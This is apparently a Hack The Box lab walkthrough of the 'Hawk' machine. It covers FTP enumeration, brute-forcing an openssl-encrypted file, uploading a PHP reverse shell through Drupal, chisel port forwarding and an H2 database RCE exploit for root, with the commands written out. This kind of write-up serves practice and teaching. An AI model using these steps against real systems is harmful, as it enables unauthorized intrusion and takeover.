# HAWK | 10.10.10.102

## Enumeration

    sudo nmap -v -T4 -sC -sV -oN nmap-initial 10.10.10.102
    
### Ports and Services

#### 21 - FTP - vsftpd 3.0.3

Anonymous login is allowed. There is a hidden file in a directory called `/messages`:

![FTP hidden file](img/ftp-enum.png)

The file is encrypted by openssl with a salted password, and then base64 encoded:

![drupal encrypted message](img/drupal-file.png)

#### 22 - SSH - OpenSSH 7.6p1 Ubuntu

Without creds, I can't do anything with this service.

#### 80 - HTTP - Apache 2.4.29 Ubuntu

This server is using the Drupal CMS, which has been known to have many security vulns. It is verson 7.58 according to the CHANGELOG.txt file:

![Drupal 7.58](img/drupal-version.png)

Gobuster is picking up many directories to check out which might keep me busy:

![GoBuster](img/gobuster.png)

There is a tool specifically made for scanning Drupal sites (appropriately named Droopescan) that I am also running to see what it pulls up. In this case, it didn't find anything I didn't already know.

![Droopescan output](img/droopescan.png)

Meanwhile a searchsploit query for Drupal 7.58 pulls up a few vulnerabilities for that version, and they are called 'Drupalgeddon' - I have used one before on a different box. Drupalgeddon 2 seems to be one that is available to use without authentication, while 3 requires a username and password. And it's a bit murky but I think this version is actually the one that it not vulnerable anymore (ie versions below 7.58 are vulnerable).

![searchsploit drupal 7.58](img/drupal-searchsploit.png)

#### 8082 - HTTP - H2 database http console

Never heard of this before, and when I go to the page it is refusing remote connections:

![H2 remote not allowed](img/H2-remote-disallowed.png)

I've exhausted pretty much everything I could think of to get anywhere, and as it is now apparent that Drupalgeddon will not work (7.58 _is_ the patched version), I went back to the encrypted file I found in the FTP server. I googled how to use openssl to decrypt a salted, base64-encoded file, learned some stuff, and also found [this tool](https://github.com/glv2/bruteforce-salted-openssl) to do a brute force. (Apparently you can also do it in a simple bash loop using openssl). With this tool I first had to decode the file from base64:

    cat drupal.txt.enc | base64 -d > d.enc
    
Then it turned up nothing when I used the rockyou wordlist at first, but it gave me a hint to try a different digest (the tool used MD5 by default). I changed the option to use SHA256 instead:

    bruteforce-salted-openssl -t 10 -v 10 -1 -f ~/dox/wordlists/rockyou.txt -m 10 -d SHA256 d.enc
    
Then it appeared to work instantly:

![password candidate](img/password.png)

Now is the moment of truth, to see if I got it correct:

    openssl enc -aes-256-cbc -d -a -in drupal.txt.enc -out pass.txt -k friends
    
It spit out a "deprecated key derivation" error, but the file "pass.txt" has content:

![decrypted note](img/pass-txt.png)

So now I have a username of daniel, and a password of PencilKeyboardScanner123.

### Exploitation

#### Logging into Drupal

It was actually the 'admin' username and that above password that gained me access to the CMS backend:

![Drupal Admin interface](img/admin.png)

The output from the droopescan indicated that the PHP module was installed and enabled, so I moved to create content and post it as PHP code. However, the module was not actually enabled, so I went to the 'Modules' section, scrolled down until I found a module called 'PHP filter' and then I enabled it.

I grabbed the code from the php-reverse-shell and then clicked on the "Add content" option near the top of the screen:

![Add content](img/add-content.png)

I opted to just add a basic page, and then pasted the PHP code into the Body, then made sure to select "PHP Code" from the drop down menu under the Body.

#### Executing the PHP shell - Foothold as www-data

Before doing anything else I spun up a netcat listener to catch the connection:

    nc -nvvlp 6969
    
Then I hit the "Preview" button at the bottom (you can also choose save). The code executes immediately, and I have a shell:

![shell as www-data](img/www-shell.png)

After I stabilized the shell, I grabbed the flag:

![user flag](img/user-flag.png)

## Privilege Escalation - www-data > root

I brought linpeas over to help with enumerating the target, and it found some things. There is an outdated sudo which could be a route for privesc (there is a buffer overflow vuln that was disclosed a few days ago but there is not a working exploit for it as far as I know). The root user is running a cron but there is nothing unusual there.

There is a mysql server running locally, so I could try to connect to that (but it is running under the mysql user and not root). Tried connecting (with and without any passwords I had) but no dice.

Finally I do see that the root user is running that H2 service that I was unable to access previously, being remote. Now I am local however. Linpeas gave me the version of H2 running:

![H2 version](img/h2-version-1.4.196.png)

And there is a Remote Code Execution exploit in the database:

![H2 RCE](img/h2-exploit.png)

Before I try to do this however, I will want to forward the port used by the service (8082), and I can do that by using the chisel tool. I just copy the binary over to the target, run a chisel server on my end, and then run the client on the target:

My machine: `./chisel server -p 9999 -reverse`

The target: `./chisel client 10.10.14.29:9999 R:8082:localhost:8082`

Now I can run the exploit from my machine, and put in 127.0.0.1 as the address, doing this bypasses the local requirement. If this doesn't work, I can also just try to run the exploit on the target.

    python3 h2rce.py -H 127.0.0.1:8082
    
Turns out I didn't need to do the port forward, running the exploit on the target itself works just fine:

![pwned](img/pwned.png)

It drops me into a neat little shell, that is not totally interactive, but it'll do.

## Conclusion

This was a not so difficult box to complete, and it apparently had other ways to privesc. I seemingly missed an entire step, going from www-data to daniel, but hey, whatever works right?

From other writeups that I checked out afterwards, I could use the port forward to connect to the web interface of the H2 service, and from there there are a few things that could be done to get a root shell, including a variant of the exploit I used. I bet the exploit wasn't available at the time of the writeup I looked at. The most interesting privesc is one where you create an alias for a long-ass java command that can execute shell commands. Then you can use it to download and execute a reverse shell.

**Steps taken:**

* Find encrypted file on open FTP server
* Decrypt file with bruteforce openssl attack
* Login to CMS, enable PHP module
* Paste PHP code into post, get reverse shell
* Use RCE exploit against outdated H2 database server, get root shell
